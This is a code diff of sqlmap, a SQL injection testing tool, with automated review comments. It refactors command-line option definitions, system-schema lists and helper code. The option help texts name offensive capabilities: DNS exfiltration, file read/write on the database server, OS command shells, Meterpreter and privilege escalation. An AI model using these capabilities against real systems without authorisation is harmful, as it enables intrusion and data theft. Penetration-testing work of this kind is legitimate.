ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/
SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2")
FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")


@ -104,20 +104,20 @@ def autoCompletion(completion=None, os=None, commands=None):
if os == OS.WINDOWS: if os == OS.WINDOWS:
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
completer = CompleterNG({ completer = CompleterNG({
"copy": None, "del": None, "dir": None, "copy": None, "del": None, "dir": None,
"echo": None, "md": None, "mem": None, "echo": None, "md": None, "mem": None,
"move": None, "net": None, "netstat -na": None, "move": None, "net": None, "netstat -na": None,
"ver": None, "xcopy": None, "whoami": None, "ver": None, "xcopy": None, "whoami": None,
}) })
else: else:
# Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
completer = CompleterNG({ completer = CompleterNG({
"cp": None, "rm": None, "ls": None, "cp": None, "rm": None, "ls": None,
"echo": None, "mkdir": None, "free": None, "echo": None, "mkdir": None, "free": None,
"mv": None, "ifconfig": None, "netstat -natu": None, "mv": None, "ifconfig": None, "netstat -natu": None,
"pwd": None, "uname": None, "id": None, "pwd": None, "uname": None, "id": None,
}) })
readline.set_completer(completer.complete) readline.set_completer(completer.complete)
readline.parse_and_bind("tab: complete") readline.parse_and_bind("tab: complete")


@ -8,7 +8,6 @@ See the file 'LICENSE' for copying permission
import errno import errno
import os import os
import subprocess import subprocess
import sys
import time import time
from lib.core.settings import IS_WIN from lib.core.settings import IS_WIN
@ -24,11 +23,6 @@ else:
import select import select
import fcntl import fcntl
if (sys.hexversion >> 16) >= 0x202:
FCNTL = fcntl
else:
import FCNTL
def blockingReadFromFD(fd): def blockingReadFromFD(fd):
# Quick twist around original Twisted function # Quick twist around original Twisted function
# Blocking read from a non-blocking file descriptor # Blocking read from a non-blocking file descriptor
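Review bot: Removing the `FCNTL` compatibility alias in the second hunk (and `import sys` in the first) is only safe if nothing further down this module still refers to `FCNTL` or `sys`; the rest of the file is outside these hunks, so that cannot be confirmed from here, and a stale reference would surface as a `NameError` only on the non-Windows path at runtime. Any remaining `FCNTL.` usage should be switched to the `fcntl` module that is still imported, in the same commit. `blockingReadFromFD` starts in the hunk and continues past it.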


@ -232,7 +232,7 @@ def _setRequestParams():
kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"): if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"):
warnMsg = "you've provided target URL without any GET " warnMsg = "you've provided target URL without any GET "
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') " warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
warnMsg += "and without providing any POST parameters " warnMsg += "and without providing any POST parameters "
@ -377,7 +377,7 @@ def _setRequestParams():
if condition: if condition:
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)} conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders] conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders]
testableParameters = True testableParameters = True
if not conf.parameters: if not conf.parameters:
@ -391,7 +391,7 @@ def _setRequestParams():
raise SqlmapGenericException(errMsg) raise SqlmapGenericException(errMsg)
if conf.csrfToken: if conf.csrfToken:
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}): if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}):
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
errMsg += "found in provided GET, POST, Cookie or header values" errMsg += "found in provided GET, POST, Cookie or header values"
raise SqlmapGenericException(errMsg) raise SqlmapGenericException(errMsg)
@ -449,13 +449,10 @@ def _resumeHashDBValues():
conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)
for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \ if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]:
injection.parameter in conf.paramDict[injection.place]:
if not conf.tech or intersect(conf.tech, injection.data.keys()): if not conf.tech or intersect(conf.tech, injection.data.keys()):
if intersect(conf.tech, injection.data.keys()): if intersect(conf.tech, injection.data.keys()):
injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech) injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech)
if injection not in kb.injections: if injection not in kb.injections:
kb.injections.append(injection) kb.injections.append(injection)
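Review bot: In the anti-CSRF check at `if not any(conf.csrfToken in _ ...` the header-name side is lowercased (`set(_[0].lower() for _ in conf.httpHeaders)`) while `conf.csrfToken` is compared as given, so a token name supplied with capitals, as header names usually are, will not match a header of the same name and the "anti-CSRF token parameter ... not found" exception is raised spuriously — unless `conf.csrfToken` is normalised before this point, which is outside the hunk. Comparing the same case on both sides, `conf.csrfToken.lower() not in set(_[0].lower() for _ in conf.httpHeaders)`, would close that gap. Separately, the `_[0]`/`_[1]` indexing in the rewritten `conf.httpHeaders` comprehension is less readable than the `header, value` unpacking it replaces; if the rename was meant to avoid the Python 2 list-comprehension variable leak, a one-line comment saying so would help the next reader. `_setRequestParams` starts before and ends after these hunks.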


@ -50,9 +50,7 @@ def cmdLineParser(argv=None):
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding) _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ usage = "%s%s [options]" % ("python " if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _)
"\"%s\"" % _ if " " in _ else _)
parser = OptionParser(usage=usage) parser = OptionParser(usage=usage)
try: try:
@ -115,15 +113,13 @@ def cmdLineParser(argv=None):
request.add_option("--load-cookies", dest="loadCookies", request.add_option("--load-cookies", dest="loadCookies",
help="File containing cookies in Netscape/wget format") help="File containing cookies in Netscape/wget format")
request.add_option("--drop-set-cookie", dest="dropSetCookie", request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true",
action="store_true",
help="Ignore Set-Cookie header from response") help="Ignore Set-Cookie header from response")
request.add_option("--user-agent", dest="agent", request.add_option("--user-agent", dest="agent",
help="HTTP User-Agent header value") help="HTTP User-Agent header value")
request.add_option("--random-agent", dest="randomAgent", request.add_option("--random-agent", dest="randomAgent", action="store_true",
action="store_true",
help="Use randomly selected HTTP User-Agent header value") help="Use randomly selected HTTP User-Agent header value")
request.add_option("--host", dest="host", request.add_option("--host", dest="host",
@ -139,62 +135,55 @@ def cmdLineParser(argv=None):
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
request.add_option("--auth-type", dest="authType", request.add_option("--auth-type", dest="authType",
help="HTTP authentication type " help="HTTP authentication type (Basic, Digest, NTLM or PKI)")
"(Basic, Digest, NTLM or PKI)")
request.add_option("--auth-cred", dest="authCred", request.add_option("--auth-cred", dest="authCred",
help="HTTP authentication credentials " help="HTTP authentication credentials (name:password)")
"(name:password)")
request.add_option("--auth-file", dest="authFile", request.add_option("--auth-file", dest="authFile",
help="HTTP authentication PEM cert/private key file") help="HTTP authentication PEM cert/private key file")
request.add_option("--ignore-code", dest="ignoreCode", type="int", request.add_option("--ignore-code", dest="ignoreCode", type="int",
help="Ignore HTTP error code (e.g. 401)") help="Ignore HTTP error code (e.g. 401)")
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
help="Ignore system default proxy settings") help="Ignore system default proxy settings")
request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true", request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true",
help="Ignore redirection attempts") help="Ignore redirection attempts")
request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true", request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true",
help="Ignore connection timeouts") help="Ignore connection timeouts")
request.add_option("--proxy", dest="proxy", request.add_option("--proxy", dest="proxy",
help="Use a proxy to connect to the target URL") help="Use a proxy to connect to the target URL")
request.add_option("--proxy-cred", dest="proxyCred", request.add_option("--proxy-cred", dest="proxyCred",
help="Proxy authentication credentials " help="Proxy authentication credentials (name:password)")
"(name:password)")
request.add_option("--proxy-file", dest="proxyFile", request.add_option("--proxy-file", dest="proxyFile",
help="Load proxy list from a file") help="Load proxy list from a file")
request.add_option("--tor", dest="tor", request.add_option("--tor", dest="tor", action="store_true",
action="store_true", help="Use Tor anonymity network")
help="Use Tor anonymity network")
request.add_option("--tor-port", dest="torPort", request.add_option("--tor-port", dest="torPort",
help="Set Tor proxy port other than default") help="Set Tor proxy port other than default")
request.add_option("--tor-type", dest="torType", request.add_option("--tor-type", dest="torType",
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
request.add_option("--check-tor", dest="checkTor", request.add_option("--check-tor", dest="checkTor", action="store_true",
action="store_true", help="Check to see if Tor is used properly")
help="Check to see if Tor is used properly")
request.add_option("--delay", dest="delay", type="float", request.add_option("--delay", dest="delay", type="float",
help="Delay in seconds between each HTTP request") help="Delay in seconds between each HTTP request")
request.add_option("--timeout", dest="timeout", type="float", request.add_option("--timeout", dest="timeout", type="float",
help="Seconds to wait before timeout connection " help="Seconds to wait before timeout connection (default %d)" % defaults.timeout)
"(default %d)" % defaults.timeout)
request.add_option("--retries", dest="retries", type="int", request.add_option("--retries", dest="retries", type="int",
help="Retries when the connection timeouts " help="Retries when the connection timeouts (default %d)" % defaults.retries)
"(default %d)" % defaults.retries)
request.add_option("--randomize", dest="rParam", request.add_option("--randomize", dest="rParam",
help="Randomly change value for given parameter(s)") help="Randomly change value for given parameter(s)")
@ -211,8 +200,7 @@ def cmdLineParser(argv=None):
request.add_option("--safe-freq", dest="safeFreq", type="int", request.add_option("--safe-freq", dest="safeFreq", type="int",
help="Test requests between two visits to a given safe URL") help="Test requests between two visits to a given safe URL")
request.add_option("--skip-urlencode", dest="skipUrlEncode", request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true",
action="store_true",
help="Skip URL encoding of payload data") help="Skip URL encoding of payload data")
request.add_option("--csrf-token", dest="csrfToken", request.add_option("--csrf-token", dest="csrfToken",
@ -221,44 +209,36 @@ def cmdLineParser(argv=None):
request.add_option("--csrf-url", dest="csrfUrl", request.add_option("--csrf-url", dest="csrfUrl",
help="URL address to visit to extract anti-CSRF token") help="URL address to visit to extract anti-CSRF token")
request.add_option("--force-ssl", dest="forceSSL", request.add_option("--force-ssl", dest="forceSSL", action="store_true",
action="store_true",
help="Force usage of SSL/HTTPS") help="Force usage of SSL/HTTPS")
request.add_option("--hpp", dest="hpp", request.add_option("--hpp", dest="hpp", action="store_true",
action="store_true", help="Use HTTP parameter pollution method")
help="Use HTTP parameter pollution method")
request.add_option("--eval", dest="evalCode", request.add_option("--eval", dest="evalCode",
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")") help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
# Optimization options # Optimization options
optimization = OptionGroup(parser, "Optimization", "These " optimization = OptionGroup(parser, "Optimization", "These options can be used to optimize the performance of sqlmap")
"options can be used to optimize the "
"performance of sqlmap")
optimization.add_option("-o", dest="optimize", optimization.add_option("-o", dest="optimize", action="store_true",
action="store_true", help="Turn on all optimization switches")
help="Turn on all optimization switches")
optimization.add_option("--predict-output", dest="predictOutput", action="store_true", optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
help="Predict common queries output") help="Predict common queries output")
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true", optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
help="Use persistent HTTP(s) connections") help="Use persistent HTTP(s) connections")
optimization.add_option("--null-connection", dest="nullConnection", action="store_true", optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
help="Retrieve page length without actual HTTP response body") help="Retrieve page length without actual HTTP response body")
optimization.add_option("--threads", dest="threads", type="int", optimization.add_option("--threads", dest="threads", type="int",
help="Max number of concurrent HTTP(s) " help="Max number of concurrent HTTP(s) "
"requests (default %d)" % defaults.threads) "requests (default %d)" % defaults.threads)
# Injection options # Injection options
injection = OptionGroup(parser, "Injection", "These options can be " injection = OptionGroup(parser, "Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts")
"used to specify which parameters to test "
"for, provide custom injection payloads and "
"optional tampering scripts")
injection.add_option("-p", dest="testParameter", injection.add_option("-p", dest="testParameter",
help="Testable parameter(s)") help="Testable parameter(s)")
@ -270,36 +250,30 @@ def cmdLineParser(argv=None):
help="Skip testing parameters that not appear to be dynamic") help="Skip testing parameters that not appear to be dynamic")
injection.add_option("--param-exclude", dest="paramExclude", injection.add_option("--param-exclude", dest="paramExclude",
help="Regexp to exclude parameters from testing (e.g. \"ses\")") help="Regexp to exclude parameters from testing (e.g. \"ses\")")
injection.add_option("--dbms", dest="dbms", injection.add_option("--dbms", dest="dbms",
help="Force back-end DBMS to this value") help="Force back-end DBMS to this value")
injection.add_option("--dbms-cred", dest="dbmsCred", injection.add_option("--dbms-cred", dest="dbmsCred",
help="DBMS authentication credentials (user:password)") help="DBMS authentication credentials (user:password)")
injection.add_option("--os", dest="os", injection.add_option("--os", dest="os",
help="Force back-end DBMS operating system " help="Force back-end DBMS operating system to this value")
"to this value")
injection.add_option("--invalid-bignum", dest="invalidBignum", injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true",
action="store_true",
help="Use big numbers for invalidating values") help="Use big numbers for invalidating values")
injection.add_option("--invalid-logical", dest="invalidLogical", injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true",
action="store_true",
help="Use logical operations for invalidating values") help="Use logical operations for invalidating values")
injection.add_option("--invalid-string", dest="invalidString", injection.add_option("--invalid-string", dest="invalidString", action="store_true",
action="store_true",
help="Use random strings for invalidating values") help="Use random strings for invalidating values")
injection.add_option("--no-cast", dest="noCast", injection.add_option("--no-cast", dest="noCast", action="store_true",
action="store_true",
help="Turn off payload casting mechanism") help="Turn off payload casting mechanism")
injection.add_option("--no-escape", dest="noEscape", injection.add_option("--no-escape", dest="noEscape", action="store_true",
action="store_true",
help="Turn off string escaping mechanism") help="Turn off string escaping mechanism")
injection.add_option("--prefix", dest="prefix", injection.add_option("--prefix", dest="prefix",
@ -312,54 +286,40 @@ def cmdLineParser(argv=None):
help="Use given script(s) for tampering injection data") help="Use given script(s) for tampering injection data")
# Detection options # Detection options
detection = OptionGroup(parser, "Detection", "These options can be " detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase")
"used to customize the detection phase")
detection.add_option("--level", dest="level", type="int", detection.add_option("--level", dest="level", type="int",
help="Level of tests to perform (1-5, " help="Level of tests to perform (1-5, default %d)" % defaults.level)
"default %d)" % defaults.level)
detection.add_option("--risk", dest="risk", type="int", detection.add_option("--risk", dest="risk", type="int",
help="Risk of tests to perform (1-3, " help="Risk of tests to perform (1-3, default %d)" % defaults.risk)
"default %d)" % defaults.risk)
detection.add_option("--string", dest="string", detection.add_option("--string", dest="string",
help="String to match when " help="String to match when query is evaluated to True")
"query is evaluated to True")
detection.add_option("--not-string", dest="notString", detection.add_option("--not-string", dest="notString",
help="String to match when " help="String to match when query is evaluated to False")
"query is evaluated to False")
detection.add_option("--regexp", dest="regexp", detection.add_option("--regexp", dest="regexp",
help="Regexp to match when " help="Regexp to match when query is evaluated to True")
"query is evaluated to True")
detection.add_option("--code", dest="code", type="int", detection.add_option("--code", dest="code", type="int",
help="HTTP code to match when " help="HTTP code to match when query is evaluated to True")
"query is evaluated to True")
detection.add_option("--text-only", dest="textOnly", detection.add_option("--text-only", dest="textOnly", action="store_true",
action="store_true",
help="Compare pages based only on the textual content") help="Compare pages based only on the textual content")
detection.add_option("--titles", dest="titles", detection.add_option("--titles", dest="titles", action="store_true",
action="store_true",
help="Compare pages based only on their titles") help="Compare pages based only on their titles")
# Techniques options # Techniques options
techniques = OptionGroup(parser, "Techniques", "These options can be " techniques = OptionGroup(parser, "Techniques", "These options can be used to tweak testing of specific SQL injection techniques")
"used to tweak testing of specific SQL "
"injection techniques")
techniques.add_option("--technique", dest="tech", techniques.add_option("--technique", dest="tech",
help="SQL injection techniques to use " help="SQL injection techniques to use (default \"%s\")" % defaults.tech)
"(default \"%s\")" % defaults.tech)
techniques.add_option("--time-sec", dest="timeSec", techniques.add_option("--time-sec", dest="timeSec", type="int",
type="int", help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
help="Seconds to delay the DBMS response "
"(default %d)" % defaults.timeSec)
techniques.add_option("--union-cols", dest="uCols", techniques.add_option("--union-cols", dest="uCols",
help="Range of columns to test for UNION query SQL injection") help="Range of columns to test for UNION query SQL injection")
@ -374,58 +334,45 @@ def cmdLineParser(argv=None):
help="Domain name used for DNS exfiltration attack") help="Domain name used for DNS exfiltration attack")
techniques.add_option("--second-order", dest="secondOrder", techniques.add_option("--second-order", dest="secondOrder",
help="Resulting page URL searched for second-order " help="Resulting page URL searched for second-order response")
"response")
# Fingerprint options # Fingerprint options
fingerprint = OptionGroup(parser, "Fingerprint") fingerprint = OptionGroup(parser, "Fingerprint")
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true",
action="store_true",
help="Perform an extensive DBMS version fingerprint") help="Perform an extensive DBMS version fingerprint")
# Enumeration options # Enumeration options
enumeration = OptionGroup(parser, "Enumeration", "These options can " enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements")
"be used to enumerate the back-end database "
"management system information, structure "
"and data contained in the tables. Moreover "
"you can run your own SQL statements")
enumeration.add_option("-a", "--all", dest="getAll", enumeration.add_option("-a", "--all", dest="getAll", action="store_true",
action="store_true", help="Retrieve everything") help="Retrieve everything")
enumeration.add_option("-b", "--banner", dest="getBanner", enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true",
action="store_true", help="Retrieve DBMS banner") help="Retrieve DBMS banner")
enumeration.add_option("--current-user", dest="getCurrentUser", enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true",
action="store_true",
help="Retrieve DBMS current user") help="Retrieve DBMS current user")
enumeration.add_option("--current-db", dest="getCurrentDb", enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true",
action="store_true",
help="Retrieve DBMS current database") help="Retrieve DBMS current database")
enumeration.add_option("--hostname", dest="getHostname", enumeration.add_option("--hostname", dest="getHostname", action="store_true",
action="store_true",
help="Retrieve DBMS server hostname") help="Retrieve DBMS server hostname")
enumeration.add_option("--is-dba", dest="isDba", enumeration.add_option("--is-dba", dest="isDba", action="store_true",
action="store_true",
help="Detect if the DBMS current user is DBA") help="Detect if the DBMS current user is DBA")
enumeration.add_option("--users", dest="getUsers", action="store_true", enumeration.add_option("--users", dest="getUsers", action="store_true",
help="Enumerate DBMS users") help="Enumerate DBMS users")
enumeration.add_option("--passwords", dest="getPasswordHashes", enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true",
action="store_true",
help="Enumerate DBMS users password hashes") help="Enumerate DBMS users password hashes")
enumeration.add_option("--privileges", dest="getPrivileges", enumeration.add_option("--privileges", dest="getPrivileges", action="store_true",
action="store_true",
help="Enumerate DBMS users privileges") help="Enumerate DBMS users privileges")
enumeration.add_option("--roles", dest="getRoles", enumeration.add_option("--roles", dest="getRoles", action="store_true",
action="store_true",
help="Enumerate DBMS users roles") help="Enumerate DBMS users roles")
enumeration.add_option("--dbs", dest="getDbs", action="store_true", enumeration.add_option("--dbs", dest="getDbs", action="store_true",
@ -470,10 +417,8 @@ def cmdLineParser(argv=None):
enumeration.add_option("-U", dest="user", enumeration.add_option("-U", dest="user",
help="DBMS user to enumerate") help="DBMS user to enumerate")
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true",
action="store_true", help="Exclude DBMS system databases when enumerating tables")
help="Exclude DBMS system databases when "
"enumerating tables")
enumeration.add_option("--pivot-column", dest="pivotColumn", enumeration.add_option("--pivot-column", dest="pivotColumn",
help="Pivot column name") help="Pivot column name")
@ -496,28 +441,23 @@ def cmdLineParser(argv=None):
enumeration.add_option("--sql-query", dest="query", enumeration.add_option("--sql-query", dest="query",
help="SQL statement to be executed") help="SQL statement to be executed")
enumeration.add_option("--sql-shell", dest="sqlShell", enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true",
action="store_true",
help="Prompt for an interactive SQL shell") help="Prompt for an interactive SQL shell")
enumeration.add_option("--sql-file", dest="sqlFile", enumeration.add_option("--sql-file", dest="sqlFile",
help="Execute SQL statements from given file(s)") help="Execute SQL statements from given file(s)")
# Brute force options # Brute force options
brute = OptionGroup(parser, "Brute force", "These " brute = OptionGroup(parser, "Brute force", "These options can be used to run brute force checks")
"options can be used to run brute force "
"checks")
brute.add_option("--common-tables", dest="commonTables", action="store_true", brute.add_option("--common-tables", dest="commonTables", action="store_true",
help="Check existence of common tables") help="Check existence of common tables")
brute.add_option("--common-columns", dest="commonColumns", action="store_true", brute.add_option("--common-columns", dest="commonColumns", action="store_true",
help="Check existence of common columns") help="Check existence of common columns")
# User-defined function options # User-defined function options
udf = OptionGroup(parser, "User-defined function injection", "These " udf = OptionGroup(parser, "User-defined function injection", "These options can be used to create custom user-defined functions")
"options can be used to create custom user-defined "
"functions")
udf.add_option("--udf-inject", dest="udfInject", action="store_true", udf.add_option("--udf-inject", dest="udfInject", action="store_true",
help="Inject custom user-defined functions") help="Inject custom user-defined functions")
@ -526,167 +466,131 @@ def cmdLineParser(argv=None):
help="Local path of the shared library") help="Local path of the shared library")
# File system options # File system options
filesystem = OptionGroup(parser, "File system access", "These options " filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system")
"can be used to access the back-end database "
"management system underlying file system")
filesystem.add_option("--file-read", dest="rFile", filesystem.add_option("--file-read", dest="rFile",
help="Read a file from the back-end DBMS " help="Read a file from the back-end DBMS file system")
"file system")
filesystem.add_option("--file-write", dest="wFile", filesystem.add_option("--file-write", dest="wFile",
help="Write a local file on the back-end " help="Write a local file on the back-end DBMS file system")
"DBMS file system")
filesystem.add_option("--file-dest", dest="dFile", filesystem.add_option("--file-dest", dest="dFile",
help="Back-end DBMS absolute filepath to " help="Back-end DBMS absolute filepath to write to")
"write to")
# Takeover options # Takeover options
takeover = OptionGroup(parser, "Operating system access", "These " takeover = OptionGroup(parser, "Operating system access", "These options can be used to access the back-end database management system underlying operating system")
"options can be used to access the back-end "
"database management system underlying "
"operating system")
takeover.add_option("--os-cmd", dest="osCmd", takeover.add_option("--os-cmd", dest="osCmd",
help="Execute an operating system command") help="Execute an operating system command")
takeover.add_option("--os-shell", dest="osShell", takeover.add_option("--os-shell", dest="osShell", action="store_true",
action="store_true", help="Prompt for an interactive operating system shell")
help="Prompt for an interactive operating "
"system shell")
takeover.add_option("--os-pwn", dest="osPwn", takeover.add_option("--os-pwn", dest="osPwn", action="store_true",
action="store_true", help="Prompt for an OOB shell, Meterpreter or VNC")
help="Prompt for an OOB shell, "
"Meterpreter or VNC")
takeover.add_option("--os-smbrelay", dest="osSmb", takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true",
action="store_true", help="One click prompt for an OOB shell, Meterpreter or VNC")
help="One click prompt for an OOB shell, "
"Meterpreter or VNC")
takeover.add_option("--os-bof", dest="osBof", takeover.add_option("--os-bof", dest="osBof", action="store_true",
action="store_true",
help="Stored procedure buffer overflow " help="Stored procedure buffer overflow "
"exploitation") "exploitation")
takeover.add_option("--priv-esc", dest="privEsc", takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
action="store_true",
help="Database process user privilege escalation") help="Database process user privilege escalation")
takeover.add_option("--msf-path", dest="msfPath", takeover.add_option("--msf-path", dest="msfPath",
